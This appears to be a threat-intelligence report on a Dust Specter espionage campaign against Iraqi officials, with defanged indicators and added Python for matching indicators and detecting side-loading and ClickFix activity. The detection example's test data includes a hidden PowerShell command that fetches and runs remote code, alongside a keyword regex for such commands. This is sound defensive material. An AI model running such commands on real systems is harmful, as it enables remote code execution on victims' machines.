Dust Specter: Iran-Nexus APT Targets Iraqi Government via Custom .NET Malware
- Actor Motivations: Espionage, Exfiltration
- Attack Vectors: Backdoor, Dropper, RAT, Pretexting
- Attack Complexity: Medium
- Threat Risk: Low Impact/Low Probability
Threat Overview
In January 2026, the Iran-nexus threat actor Dust Specter ran a targeted cyber espionage campaign against Iraqi government officials, impersonating the Ministry of Foreign Affairs. Using compromised government infrastructure for delivery, the group deployed previously undocumented .NET malware, including the SPLITDROP dropper and the TWINTASK/TWINTALK backdoors. The primary chain relies on DLL side-loading: a legitimate signed binary such as VLC or WingetUI is dropped alongside a malicious DLL that it loads, so the backdoor runs under a trusted process name. A secondary chain delivers GHOSTFORM, a consolidated RAT that uses an invisible Windows Forms window to delay execution and runs PowerShell in memory to minimize its forensic footprint. Evidence suggests the actors used generative AI to speed up code development, and they employed "ClickFix" social engineering, in which the target is talked into pasting a command into a Run dialog or terminal, to compromise targets.
Detected Targets
| Type | Description | Confidence |
|---|---|---|
| Sector | Government Agencies and Services | Verified |
| Region | Iraq | Verified |
Extracted IOCs
- afterworld[.]store
- ca[.]iq
- girlsbags[.]shop
- lecturegenieltd[.]pro
- meetingapp[.]site
- onlinepettools[.]shop
- web14[.]info
- web27[.]info
- 19ab3fd2800f62a47bf13a4cc4e4c124
- 63702bd6422ec2d5678d4487146ea434
- 70a9b537b9b7e1b410576d798e6c5043
- 78275f3fc7e209b85bff6a6f99acc68a
- 7f17fa22feaced1a16d4d39c545cdb16
- 809139c237c4062baecab43570060d67
- 8f44262afaa171b78fc9be20a0fb0071
- a7561eb023bb2c4025defcfe758d8ac2
- aa887d32eb9467abba263920e55d6abe
- b19add5ccaa17a1308993e6f3f786b06
- b8254efd859f5420f1ce4060e4796c08
- d5ddf40ba2506c57d3087d032d733e08
- 1debc4c512ded889464e386739d5d2f61b87ff13
- 369b56a89b2fce2cbdc36f5a23bdec6067242911
- 51a746c85bd486f223130173b7e674379a51b694
- 682c043443cb81b6c2fde8c5df43333f5d1fec53
- 8621be9e1aa730d1ac8eb06fa8f66d9da70ff293
- 8735ee29c409b8d101eb3170f011455be41b7a91
- ad97e1bba1d040a237727afdb2787d6867d72b74
- c79c261457def606c3393dde77c82832a5c0ded3
- c7dff3a0675f330feb9a7c469f8340369451d122
- cb1760c90fb6c399e0125c7aa793efe37c4ce533
- df04e36c106691f9fe88e5798e4ae86438bd4f1d
- fc08f8403849c6233978a363f4cdc58cd7041823
- 293ee1fe8d36aa79cf1f64f5ddef402bc6939d229c6fca955c7b796119564779
- 3a66ae5942f6feb79cf81ee70451f761253e0e0bde95f0840abdd42a804fad39
- 69294ad90aeb7f05e501e7191c95beb14e23da5587dd75557c867e2944a57fdc
- 6af71297ce7681e64d9a4c5449a7326f17f3f107cb7940ec5e0840390c457a47
- 6bb0d45799076b3f2d7f602b978a0779868fc72a1188374f6919fbbfba23efce
- 797325b3c8a9356dcace75d93cb5cfb7847d2049c66772d4cc2cee821618cb96
- 903f7869a94d88d43b9140bb656f7bb86ef725efc78ef2ff9d12fd7c7c2aca74
- a27d53608ab05b5c7cb86bcf4a273435238beeb7e7efd7845375b2aa765f51e2
- ad26cd72a83b884a8bc5aaa87309683953e151ebb3fde42eda7bf9a4406e530d
- eb5b7275c41de8e98d72696eeac9cba3719f334f8e7974e6b8760ece820b1d0c
- f3f2dc31f70a105db161a5e7b463b2215d3cbd64ac0146fd68e39da1c279f7ef
- fa51aff99d86a9f1f65aa0ebbf6ca40411d343cea59370851ab328b97e2164bb
- hxxps://ca[.]iq/packages/mofasurvey_20_30_oct.zip
45 related IOCs have been extracted for this threat: 8 domains, 1 URL and 36 file hashes (12 MD5, 12 SHA-1, 12 SHA-256); no IP addresses or e-mail addresses.
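The list above is defanged (hxxps, [.]), so it cannot be matched against telemetry as-is. The Python below is an added example, not part of the original report: it refangs a subset of the indicators listed above, types them by shape, and matches them against a handful of constructed DNS, proxy and EDR log lines. The indicators are copied from the list; the log lines, client addresses, host name and field layout are made up for the example. Domain matching also catches subdomains of a listed domain, which the list itself does not spell out.

```python
import re
from urllib.parse import urlparse

# A subset of the indicators listed above, copied still in defanged form.
DEFANGED_IOCS = [
    "afterworld[.]store",
    "ca[.]iq",
    "meetingapp[.]site",
    "hxxps://ca[.]iq/packages/mofasurvey_20_30_oct.zip",
    "19ab3fd2800f62a47bf13a4cc4e4c124",                                  # MD5
    "1debc4c512ded889464e386739d5d2f61b87ff13",                          # SHA-1
    "293ee1fe8d36aa79cf1f64f5ddef402bc6939d229c6fca955c7b796119564779",  # SHA-256
]

# Constructed log lines for the example; not real telemetry.
LOG_LINES = [
    "2026-01-14T09:12:01Z dns client=10.0.0.21 query=ca.iq type=A",
    "2026-01-14T09:12:03Z proxy client=10.0.0.21 method=GET "
    "url=https://ca.iq/packages/mofasurvey_20_30_oct.zip status=200",
    "2026-01-14T09:15:44Z dns client=10.0.0.33 query=mail.example.gov.iq type=MX",
    "2026-01-14T09:20:10Z edr host=WS-07 event=FileCreate "
    "path=C:\\Users\\alice\\Downloads\\survey.exe "
    "sha256=293ee1fe8d36aa79cf1f64f5ddef402bc6939d229c6fca955c7b796119564779",
    "2026-01-14T09:21:00Z dns client=10.0.0.33 query=cdn.meetingapp.site type=A",
]

HASH_RE = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{40}\b|\b[0-9a-f]{32}\b")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")


def refang(ioc):
    """Undo the usual defanging: hxxp(s):// -> http(s)://, [.] -> ."""
    s = ioc.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    s = s.replace("[.]", ".").replace("(.)", ".").replace("[://]", "://")
    return s.lower()


def classify(ioc):
    """Type a refanged indicator by its shape."""
    if re.fullmatch(r"[0-9a-f]{32}", ioc):
        return "md5"
    if re.fullmatch(r"[0-9a-f]{40}", ioc):
        return "sha1"
    if re.fullmatch(r"[0-9a-f]{64}", ioc):
        return "sha256"
    if ioc.startswith(("http://", "https://")):
        return "url"
    return "domain"


def build_index(defanged):
    """Group refanged indicators by type; a URL's host is also a domain indicator."""
    index = {k: set() for k in ("md5", "sha1", "sha256", "url", "domain")}
    for raw in defanged:
        ioc = refang(raw)
        index[classify(ioc)].add(ioc)
    for url in index["url"]:
        host = urlparse(url).hostname
        if host:
            index["domain"].add(host)
    return index


def domain_match(host, domains):
    """Return the indicator that host equals or is a subdomain of, else None."""
    host = host.rstrip(".")
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return None


def scan_line(line, index):
    """All (type, indicator) hits in one log line; lowercased so hex and hosts compare."""
    text = line.lower()
    hits = set()
    for h in HASH_RE.findall(text):
        kind = {32: "md5", 40: "sha1", 64: "sha256"}[len(h)]
        if h in index[kind]:
            hits.add((kind, h))
    for url in URL_RE.findall(text):
        if url.rstrip("/") in index["url"]:
            hits.add(("url", url))
    for host in HOST_RE.findall(text):
        d = domain_match(host, index["domain"])
        if d:
            hits.add(("domain", d))
    return hits


def scan_logs(lines, index):
    """(1-based line number, hits) for every line that touched an indicator."""
    out = []
    for n, line in enumerate(lines, 1):
        hits = scan_line(line, index)
        if hits:
            out.append((n, hits))
    return out


if __name__ == "__main__":
    for n, hits in scan_logs(LOG_LINES, build_index(DEFANGED_IOCS)):
        print(f"line {n}: {sorted(hits)}")
```

Lines 1, 2, 4 and 5 of the constructed sample hit (the DNS query for ca.iq, the download URL, the SHA-256 of the dropped file, and a subdomain of meetingapp.site); the MX lookup for an unrelated .gov.iq host on line 3 does not, because suffix matching is anchored on a dot and never treats example.gov.iq as a child of ca.iq.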
FAQs
Targeting Iraqi Government Officials
A cybersecurity campaign was uncovered where attackers compromised legitimate government websites to distribute new, custom-built malicious software. The attackers used deceptive surveys and fake meeting invitations to trick targets into installing hidden backdoor programs onto their computers.
The attack is attributed with moderate to high confidence to a group tracked as Dust Specter. This group is believed to be an Iran-nexus threat actor and shares similar techniques, tools, and targets with historically known Iran-linked groups like APT34.
The campaign was an espionage operation designed to install persistent, lightweight backdoor programs and Remote Access Trojans (RATs) on victim machines. The goal was to establish covert command-and-control channels that let the attackers execute arbitrary commands, push files to the victim machine, and exfiltrate sensitive data.
This was not a widespread attack on the general public; it was highly concentrated. The operation specifically focused on the government sector in Iraq.
Yes, the campaign directly targeted Iraqi government officials. The attackers heavily relied on customized social engineering lures that masqueraded as official communications and surveys from Iraq’s Ministry of Foreign Affairs.
Attackers sent targets password-protected files or fake "Webex" meeting links. Once a victim opened a lure, a dropper installed the backdoor beside a legitimate, signed program (such as the VLC media player) that loads it, so the malicious code runs under a trusted process name, evades antivirus software, and communicates silently with the attackers. Analysis of the malware suggests its code was written with generative-AI assistance.
Government officials, particularly those in a Ministry of Foreign Affairs, possess highly sensitive diplomatic communications, state secrets, and policy data. This makes them prime, high-value targets for state-sponsored cyber espionage groups gathering intelligence.
Individuals should remain highly skeptical of unexpected password-protected files and be wary of prompts that ask them to copy and paste commands to "fix" a video or join a meeting (known as ClickFix attacks); a legitimate meeting client or media player never requires that. Organizations should monitor for signed programs running from user-writable folders such as Downloads or Temp and for DLLs loaded from those folders, and regularly audit their public web servers to ensure they haven't been compromised and turned into malware hosts.
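As an added example that is not part of the original report, the Python below turns the two checks this answer and the overview call for into detection logic over constructed Sysmon-style events: a signed host binary such as vlc.exe or wingetui.exe running from a user-writable folder and loading an unsigned DLL from that same folder (the side-loading pattern described in the overview), and an interpreter launched from explorer.exe with a hidden or download-style command line (the ClickFix pattern). Field names follow Sysmon event IDs 1 and 7; the event contents, the watchlist of host binaries, the trusted-directory list and the command-line regex are assumptions for the example, not indicators from the report.

```python
import ntpath
import re

# Host binaries the report names as side-loading vehicles (assumed basenames)
# and the directories a genuine install of such software would live in.
SIDELOAD_HOSTS = {"vlc.exe", "wingetui.exe"}
TRUSTED_DIRS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Command-line features typical of a pasted ClickFix one-liner (assumed list).
CLICKFIX_CMD = re.compile(
    r"-(?:w|win|window|windowstyle)\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s"
    r"|\biex\b|invoke-expression|\biwr\b|invoke-webrequest|downloadstring"
    r"|mshta\s+https?://",
    re.IGNORECASE,
)

# Constructed Sysmon-style events (EventID 7 = image load, 1 = process create).
# Sysmon's "Signed" field describes the loaded module, not the host process.
EVENTS = [
    {"EventID": 7,
     "Image": r"C:\Users\alice\AppData\Local\Temp\MofaSurvey\vlc.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\MofaSurvey\libvlc.dll",
     "Signed": "false"},
    {"EventID": 7,
     "Image": r"C:\Program Files\VideoLAN\VLC\vlc.exe",
     "ImageLoaded": r"C:\Program Files\VideoLAN\VLC\libvlc.dll",
     "Signed": "true"},
    {"EventID": 7,
     "Image": r"C:\Users\alice\Downloads\Meeting\app.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\Meeting\version.dll",
     "Signed": "false"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/fix)"'},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]


def in_trusted_dir(path):
    p = path.lower()
    return any(p.startswith(d + "\\") for d in TRUSTED_DIRS)


def same_dir(a, b):
    return ntpath.dirname(a).lower() == ntpath.dirname(b).lower()


def check_image_load(ev):
    """Rule 1: unsigned DLL loaded from the host binary's own, user-writable folder."""
    host = ntpath.basename(ev["Image"]).lower()
    loaded = ev["ImageLoaded"]
    if not loaded.lower().endswith(".dll"):
        return None
    if str(ev.get("Signed", "false")).lower() == "true":
        return None                      # signed module: not the pattern we want
    if not same_dir(ev["Image"], loaded):
        return None                      # different folder: outside this rule
    if in_trusted_dir(ev["Image"]):
        return None                      # unsigned vendor DLLs under Program Files are common
    level = "high" if host in SIDELOAD_HOSTS else "medium"
    return (f"sideload/{level}: {host} loaded unsigned "
            f"{ntpath.basename(loaded)} from {ntpath.dirname(loaded)}")


def check_process_create(ev):
    """Rule 2: interpreter spawned by explorer.exe (Run dialog) with a ClickFix-style command line."""
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    if image not in INTERPRETERS or parent != "explorer.exe":
        return None
    m = CLICKFIX_CMD.search(ev.get("CommandLine", ""))
    if not m:
        return None
    return (f"clickfix: {image} spawned by explorer.exe, "
            f"command line contains '{m.group(0).strip()}'")


def detect(events):
    """Run the rule matching each event's ID; return (event index, alert) pairs."""
    rules = {7: check_image_load, 1: check_process_create}
    alerts = []
    for i, ev in enumerate(events):
        rule = rules.get(ev["EventID"])
        alert = rule(ev) if rule else None
        if alert:
            alerts.append((i, alert))
    return alerts


if __name__ == "__main__":
    for i, alert in detect(EVENTS):
        print(f"event {i}: {alert}")
```

Events 0, 2 and 3 of the constructed sample alert; the genuine VLC install loading its own signed libvlc.dll and the PowerShell script launched from cmd.exe do not. Rule 1 deliberately ignores trusted directories because many vendors ship unsigned DLLs under Program Files; the signal is the combination of a user-writable folder, an unsigned module and a host that loads from its own directory.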
This is a strictly targeted issue. The threat actors focused their customized lures, specific infrastructure, and tailored malware exclusively on individuals working within or adjacent to the Iraqi government.